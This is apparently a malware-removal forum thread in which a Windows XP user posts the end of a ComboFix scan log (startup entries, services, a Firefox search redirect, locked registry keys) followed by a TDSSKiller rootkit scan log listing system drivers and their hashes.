[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="c:\progra~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" [2007-03-23 39264]
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2011-07-19 113024]
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\!SASCORE]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
@="Service"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk]
path=c:\documents and settings\All Users\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
backup=c:\windows\pss\HP Digital Imaging Monitor.lnkCommon Startup
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Logitech Desktop Messenger.lnk]
backup=c:\windows\pss\Logitech Desktop Messenger.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KernelFaultCheck]
c:\windows\system32\dumprep 0 -k [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Alcmtr]
2004-04-27 02:21 57344 ----a-w- c:\windows\ALCMTR.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AlcWzrd]
2004-05-03 20:23 2533888 ----a-w- c:\windows\ALCWZRD.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AppleSyncNotifier]
2008-11-07 20:16 111936 ----a-w- c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BackupNotify]
2004-01-09 08:34 32768 ----a-w- c:\program files\HP\Digital Imaging\bin\BackupNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 00:12 15360 ----a-w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite]
2008-02-13 23:09 486856 ----a-w- c:\program files\DAEMON Tools Lite\daemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HotKeysCmds]
2004-08-20 21:51 118784 ----a-w- c:\windows\system32\hkcmd.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Component Manager]
2003-12-22 22:38 241664 ----a-w- c:\program files\HP\hpcoretech\hpcmpmgr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]
2007-10-15 03:17 49152 ----a-w- c:\program files\HP\HP Software Update\hpwuSchd2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HPHmon05]
2003-08-21 10:15 483328 ----a-w- c:\windows\system32\hphmon05.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HPHUPD05]
2003-08-21 10:23 49152 ----a-w- c:\program files\HP\{45B6180B-DCAB-4093-8EE8-6164457517F0}\hphupd05.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\hpqSRMon]
2007-08-22 22:31 80896 ----a-w- c:\program files\HP\Digital Imaging\bin\HpqSRmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IgfxTray]
2004-08-20 21:55 155648 ----a-w- c:\windows\system32\igfxtray.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2008-11-20 19:20 290088 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2008-04-14 00:12 1695232 ----a-w- c:\program files\Messenger\msmsgs.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Recguard]
2004-06-14 16:26 233472 ----a-w- c:\windows\SMINST\Recguard.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SoundMan]
2004-05-03 18:21 67584 ----a-w- c:\windows\SOUNDMAN.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusOverride"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\Program Files\\Updates from HP\\137903\\Program\\BackWeb-137903.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\LeapFTP\\LeapFTP.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\WINDOWS\\system32\\mmc.exe"=
"c:\\Program Files\\Windows Media Player\\wmplayer.exe"=
"c:\\Program Files\\activePDF\\PrimoPDF\\PrimoPDF.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\DNA\\btdna.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqcopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\IncrediMail\\bin\\ImApp.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\WINDOWS\\system32\\sessmgr.exe"=
.
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [1/14/2013 7:25 PM 738504]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [1/14/2013 7:26 PM 361032]
R1 eusk2par;EUTRON SmartKey Parallel Driver;c:\windows\system32\drivers\eusk2par.sys [12/23/2009 5:21 PM 30656]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [7/22/2011 10:27 AM 12880]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [7/12/2011 3:55 PM 67664]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [1/14/2013 7:26 PM 21256]
R2 WinDefend;Windows Defender;c:\program files\Windows Defender\MsMpEng.exe [11/3/2006 7:19 PM 13592]
S1 MpKsl08115bda;MpKsl08115bda;\??\c:\windows\system32\MpEngineStore\MpKsl08115bda.sys --> c:\windows\system32\MpEngineStore\MpKsl08115bda.sys [?]
S2 !SASCORE;SAS Core Service; [x]
S2 avg9emc;AVG Free E-mail Scanner; [x]
S2 avg9wd;AVG Free WatchDog; [x]
S2 mrtRate;mrtRate; [x]
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - ASWMBR
*Deregistered* - aswMBR
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2013-01-14 20:20 1606760 ----a-w- c:\program files\Google\Chrome\Application\24.0.1312.52\Installer\setup.exe
.
Contents of the 'Scheduled Tasks' folder
.
2013-01-19 c:\windows\Tasks\avast! Emergency Update.job
- c:\program files\AVAST Software\Avast\AvastEmUpdate.exe [2013-01-15 23:50]
.
2013-01-19 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-01-14 20:11]
.
2013-01-19 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-01-14 20:11]
.
2013-01-19 c:\windows\Tasks\MP Scheduled Scan.job
- c:\program files\Windows Defender\MpCmdRun.exe [2006-11-04 01:20]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.bing.com/
uInternet Settings,ProxyOverride = <local>
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\documents and settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\
FF - prefs.js: browser.startup.homepage - www.startpage.com
FF - prefs.js: keyword.URL - hxxp://search.mywebstart.net/?sid=10101070100&s=
FF - ExtSQL: 2013-01-14 19:27; [email protected]; c:\program files\AVAST Software\Avast\WebRep\FF
FF - ExtSQL: !HIDDEN! 2009-08-14 02:23; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - user.js: browser.search.order.1 - Search
FF - user.js: keyword.URL - hxxp://search.mywebstart.net/?sid=10101070100&s=
.
- - - - ORPHANS REMOVED - - - -
.
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
Notify-avgrsstarter - avgrsstx.dll
SafeBoot-07341577.sys
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2013-01-18 20:21
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}]
@DACL=(02 0000)
@="Microsoft Disk Quota"
"NoMachinePolicy"=dword:00000000
"NoUserPolicy"=dword:00000001
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"RequiresSuccessfulRegistry"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000000
"DllName"=expand:"dskquota.dll"
"ProcessGroupPolicy"="ProcessGroupPolicy"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3}]
@DACL=(02 0000)
@="Internet Explorer Zonemapping"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"ProcessGroupPolicy"="ProcessGroupPolicyForZoneMap"
"NoGPOListChanges"=dword:00000001
"RequiresSucessfulRegistry"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE}]
@DACL=(02 0000)
@="Internet Explorer User Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessSecurityPolicyGPO"
"GenerateGroupPolicy"="SceGenerateGroupPolicy"
"ExtensionRsopPlanningDebugLevel"=dword:00000001
"ProcessGroupPolicyEx"="SceProcessSecurityPolicyGPOEx"
"ExtensionDebugLevel"=dword:00000001
"DllName"=expand:"scecli.dll"
@="Security"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000001
"MaxNoGPOListChangesInterval"=dword:000003c0
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A2E30F80-D7DE-11d2-BBDE-00C04F86AE3B}]
@DACL=(02 0000)
"ProcessGroupPolicyEx"="ProcessGroupPolicyEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"ProcessGroupPolicy"="ProcessGroupPolicy"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
@="Internet Explorer Branding"
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000001
"NoMachinePolicy"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3014"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessEFSRecoveryGPO"
"DllName"=expand:"scecli.dll"
@="EFS recovery"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053}]
@DACL=(02 0000)
@="802.3 Group Policy"
"DisplayName"=expand:"@dot3gpclnt.dll,-100"
"ProcessGroupPolicyEx"="ProcessLANPolicyEx"
"GenerateGroupPolicy"="GenerateLANPolicy"
"DllName"=expand:"dot3gpclnt.dll"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8}]
@DACL=(02 0000)
@="Microsoft Offline Files"
"DllName"=expand:"%SystemRoot%\\System32\\cscui.dll"
"EnableAsynchronousProcessing"=dword:00000000
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000000
"NoMachinePolicy"=dword:00000000
"NoSlowLink"=dword:00000000
"NoUserPolicy"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"ProcessGroupPolicy"="ProcessGroupPolicy"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7}]
@DACL=(02 0000)
@="Software Installation"
"DllName"=expand:"appmgmts.dll"
"ProcessGroupPolicyEx"="ProcessGroupPolicyObjectsEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"NoBackgroundPolicy"=dword:00000000
"RequiresSucessfulRegistry"=dword:00000000
"NoSlowLink"=dword:00000001
"PerUserLocalSettings"=dword:00000001
"EventSources"=multi:"(Application Management,Application)\00(MsiInstaller,Application)\00\00"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D}]
@DACL=(02 0000)
@="Internet Explorer Machine Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
@DACL=(02 0000)
"HelpAssistant"=dword:00000000
"TsInternetUser"=dword:00000000
"SQLAgentCmdExec"=dword:00000000
"NetShowServices"=dword:00000000
"IWAM_"=dword:00010000
"IUSR_"=dword:00010000
"VUSR_"=dword:00010000
"ASPNET"=dword:00000000
.
Completion time: 2013-01-18 20:23:59
ComboFix-quarantined-files.txt 2013-01-19 02:23
.
Pre-Run: 80,107,855,872 bytes free
Post-Run: 80,564,518,912 bytes free
.
- - End Of File - - CC80B0E3F9FBCED46643A137F67B2FA6

#6
goodseed

Posted 18 January 2013 - 08:41 PM

Member

Topic Starter
Member
49 posts

20:30:58.0250 1300 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
20:30:58.0906 1300 ============================================================
20:30:58.0906 1300 Current date / time: 2013/01/18 20:30:58.0906
20:30:58.0921 1300 SystemInfo:
20:30:58.0921 1300
20:30:58.0921 1300 OS Version: 5.1.2600 ServicePack: 3.0
20:30:58.0921 1300 Product type: Workstation
20:30:58.0921 1300 ComputerName: YOUR-46E94OWX6A
20:30:58.0921 1300 UserName: Owner
20:30:58.0921 1300 Windows directory: C:\WINDOWS
20:30:58.0921 1300 System windows directory: C:\WINDOWS
20:30:58.0921 1300 Processor architecture: Intel x86
20:30:58.0921 1300 Number of processors: 2
20:30:58.0921 1300 Page size: 0x1000
20:30:58.0921 1300 Boot type: Normal boot
20:30:58.0921 1300 ============================================================
20:30:59.0671 1300 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x50C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xF0, Type 'K0', Flags 0x00000054
20:30:59.0921 1300 ============================================================
20:30:59.0921 1300 \Device\Harddisk0\DR0:
20:30:59.0921 1300 MBR partitions:
20:30:59.0921 1300 \Device\Harddisk0\DR0\Partition1: MBR, Type 0xB, StartLBA 0x3F, BlocksNum 0x9B7FE1
20:30:59.0921 1300 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x9B8020, BlocksNum 0x1205CBE0
20:30:59.0921 1300 ============================================================
20:30:59.0968 1300 C: <-> \Device\Harddisk0\DR0\Partition2
20:30:59.0968 1300 D: <-> \Device\Harddisk0\DR0\Partition1
20:30:59.0984 1300 ============================================================
20:30:59.0984 1300 Initialize success
20:30:59.0984 1300 ============================================================
20:31:19.0718 2536 ============================================================
20:31:19.0718 2536 Scan started
20:31:19.0718 2536 Mode: Manual;
20:31:19.0718 2536 ============================================================
20:31:20.0531 2536 ================ Scan system memory ========================
20:31:20.0531 2536 System memory - ok
20:31:20.0531 2536 ================ Scan services =============================
20:31:20.0703 2536 [ 149A8F7ADF9742554DC323E290551E3E ] Aavmker4 C:\WINDOWS\system32\drivers\Aavmker4.sys
20:31:20.0703 2536 Aavmker4 - ok
20:31:20.0703 2536 Abiosdsk - ok
20:31:20.0718 2536 abp480n5 - ok
20:31:20.0765 2536 [ 8FD99680A539792A30E97944FDAECF17 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
20:31:20.0765 2536 ACPI - ok
20:31:20.0796 2536 [ 9859C0F6936E723E4892D7141B1327D5 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
20:31:20.0796 2536 ACPIEC - ok
20:31:20.0812 2536 adpu160m - ok
20:31:20.0859 2536 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
20:31:20.0859 2536 aec - ok
20:31:20.0937 2536 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
20:31:20.0937 2536 AFD - ok
20:31:20.0953 2536 [ C685CC27A2E637F0DCB5A45E67CC6F74 ] AFS2K C:\WINDOWS\system32\drivers\AFS2K.sys
20:31:20.0953 2536 AFS2K - ok
20:31:21.0031 2536 [ 593AEFC67283D409F34CC1245D00A509 ] AgereSoftModem C:\WINDOWS\system32\DRIVERS\AGRSM.sys
20:31:21.0093 2536 AgereSoftModem - ok
20:31:21.0109 2536 Aha154x - ok
20:31:21.0125 2536 aic78u2 - ok
20:31:21.0125 2536 aic78xx - ok
20:31:21.0156 2536 [ A9A3DAA780CA6C9671A19D52456705B4 ] Alerter C:\WINDOWS\system32\alrsvc.dll
20:31:21.0156 2536 Alerter - ok
20:31:21.0187 2536 [ 8C515081584A38AA007909CD02020B3D ] ALG C:\WINDOWS\System32\alg.exe
20:31:21.0187 2536 ALG - ok
20:31:21.0203 2536 AliIde - ok
20:31:21.0234 2536 [ 8FCE268CDBDD83B23419D1F35F42C7B1 ] AmdK7 C:\WINDOWS\system32\DRIVERS\amdk7.sys
20:31:21.0234 2536 AmdK7 - ok
20:31:21.0234 2536 amsint - ok
20:31:21.0250 2536 AppMgmt - ok
20:31:21.0265 2536 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
20:31:21.0265 2536 Arp1394 - ok
20:31:21.0265 2536 asc - ok
20:31:21.0281 2536 asc3350p - ok
20:31:21.0296 2536 asc3550 - ok
20:31:21.0437 2536 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
20:31:21.0453 2536 aspnet_state - ok
20:31:21.0484 2536 [ DE6ED95AEF259979B2830450072A627B ] aswFsBlk C:\WINDOWS\system32\drivers\aswFsBlk.sys
20:31:21.0484 2536 aswFsBlk - ok
20:31:21.0515 2536 [ 84F0BE324EE111338589F448C3E8BAB2 ] aswMon2 C:\WINDOWS\system32\drivers\aswMon2.sys
20:31:21.0515 2536 aswMon2 - ok
20:31:21.0562 2536 [ 7C9F0A2AB17D52261A9252A2EB320884 ] AswRdr C:\WINDOWS\system32\drivers\AswRdr.sys
20:31:21.0562 2536 AswRdr - ok
20:31:21.0593 2536 [ B32E9AD44A1DBB3E8095E80F8DF32B03 ] aswSnx C:\WINDOWS\system32\drivers\aswSnx.sys
20:31:21.0625 2536 aswSnx - ok
20:31:21.0640 2536 [ 67B558895695545FB0568B7541F3BCA7 ] aswSP C:\WINDOWS\system32\drivers\aswSP.sys
20:31:21.0656 2536 aswSP - ok
20:31:21.0671 2536 [ E3E73B2B73A4DFADFDDF557192C4B08A ] aswTdi C:\WINDOWS\system32\drivers\aswTdi.sys
20:31:21.0671 2536 aswTdi - ok
20:31:21.0718 2536 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
20:31:21.0718 2536 AsyncMac - ok
20:31:21.0718 2536 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
20:31:21.0718 2536 atapi - ok
20:31:21.0734 2536 Atdisk - ok
20:31:21.0765 2536 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
20:31:21.0765 2536 Atmarpc - ok
20:31:21.0796 2536 [ DEF7A7882BEC100FE0B2CE2549188F9D ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
20:31:21.0796 2536 AudioSrv - ok
20:31:21.0843 2536 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
20:31:21.0843 2536 audstub - ok
20:31:21.0921 2536 [ 8FA553E9AE69808D99C164733A0F9590 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
20:31:21.0937 2536 avast! Antivirus - ok
20:31:21.0984 2536 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
20:31:22.0000 2536 Beep - ok
20:31:22.0046 2536 [ 574738F61FCA2935F5265DC4E5691314 ] BITS C:\WINDOWS\system32\qmgr.dll
20:31:22.0093 2536 BITS - ok
20:31:22.0156 2536 [ 3F56903E124E820AEECE6D471583C6C1 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:31:22.0156 2536 Bonjour Service - ok
20:31:22.0187 2536 [ CFD4E51402DA9838B5A04AE680AF54A0 ] Browser C:\WINDOWS\System32\browser.dll
20:31:22.0203 2536 Browser - ok
20:31:22.0234 2536 [ 248DFA5762DDE38DFDDBBD44149E9D7A ] BVRPMPR5 C:\WINDOWS\system32\drivers\BVRPMPR5.SYS
20:31:22.0234 2536 BVRPMPR5 - ok
20:31:22.0390 2536 catchme - ok
20:31:22.0421 2536 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
20:31:22.0421 2536 cbidf2k - ok
20:31:22.0421 2536 cd20xrnt - ok
20:31:22.0453 2536 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
20:31:22.0453 2536 Cdaudio - ok
20:31:22.0500 2536 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
20:31:22.0500 2536 Cdfs - ok
20:31:22.0515 2536 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
20:31:22.0531 2536 Cdrom - ok
20:31:22.0531 2536 Changer - ok
20:31:22.0562 2536 [ 1CFE720EB8D93A7158A4EBC3AB178BDE ] CiSvc C:\WINDOWS\system32\cisvc.exe
20:31:22.0562 2536 CiSvc - ok
20:31:22.0578 2536 [ 34CBE729F38138217F9C80212A2A0C82 ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
20:31:22.0593 2536 ClipSrv - ok
20:31:22.0625 2536 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
20:31:22.0781 2536 clr_optimization_v2.0.50727_32 - ok
20:31:22.0796 2536 CmdIde - ok
20:31:22.0812 2536 COMSysApp - ok
20:31:22.0828 2536 Cpqarray - ok
20:31:22.0890 2536 [ 3D4E199942E29207970E04315D02AD3B ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
20:31:22.0890 2536 CryptSvc - ok
20:31:22.0890 2536 dac2w2k - ok
20:31:22.0906 2536 dac960nt - ok
20:31:22.0968 2536 [ 6B27A5C03DFB94B4245739065431322C ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
20:31:22.0984 2536 DcomLaunch - ok
20:31:23.0031 2536 [ 5E38D7684A49CACFB752B046357E0589 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
20:31:23.0031 2536 Dhcp - ok
20:31:23.0078 2536 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
20:31:23.0078 2536 Disk - ok
20:31:23.0093 2536 dmadmin - ok
20:31:23.0125 2536 [ D992FE1274BDE0F84AD826ACAE022A41 ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
20:31:23.0156 2536 dmboot - ok
20:31:23.0187 2536 [ 7C824CF7BBDE77D95C08005717A95F6F ] dmio C:\WINDOWS\system32\drivers\dmio.sys
20:31:23.0187 2536 dmio - ok
20:31:23.0203 2536 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
20:31:23.0203 2536 dmload - ok
20:31:23.0234 2536 [ 57EDEC2E5F59F0335E92F35184BC8631 ] dmserver C:\WINDOWS\System32\dmserver.dll
20:31:23.0234 2536 dmserver - ok
20:31:23.0265 2536 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
20:31:23.0265 2536 DMusic - ok
20:31:23.0312 2536 [ 5F7E24FA9EAB896051FFB87F840730D2 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
20:31:23.0312 2536 Dnscache - ok
20:31:23.0343 2536 [ 0F0F6E687E5E15579EF4DA8DD6945814 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
20:31:23.0359 2536 Dot3svc - ok
20:31:23.0359 2536 dpti2o - ok
20:31:23.0375 2536 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
20:31:23.0375 2536 drmkaud - ok
20:31:23.0406 2536 [ 2187855A7703ADEF0CEF9EE4285182CC ] EapHost C:\WINDOWS\System32\eapsvc.dll
20:31:23.0406 2536 EapHost - ok
20:31:23.0453 2536 [ BC93B4A066477954555966D77FEC9ECB ] ERSvc C:\WINDOWS\System32\ersvc.dll
20:31:23.0453 2536 ERSvc - ok
20:31:23.0500 2536 [ 38008FAAA9632C2EF8E98BF1614D0527 ] eusk2par C:\WINDOWS\system32\Drivers\eusk2par.sys
20:31:23.0500 2536 eusk2par - ok
20:31:23.0531 2536 [ 65DF52F5B8B6E9BBD183505225C37315 ] Eventlog C:\WINDOWS\system32\services.exe
20:31:23.0546 2536 Eventlog - ok
20:31:23.0578 2536 [ D4991D98F2DB73C60D042F1AEF79EFAE ] EventSystem C:\WINDOWS\System32\es.dll
20:31:23.0593 2536 EventSystem - ok
20:31:23.0640 2536 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
20:31:23.0640 2536 Fastfat - ok
20:31:23.0671 2536 [ 1E580770BDECE924494B368AC980749E ] fasttx2k C:\WINDOWS\system32\DRIVERS\fasttx2k.sys
20:31:23.0671 2536 fasttx2k - ok
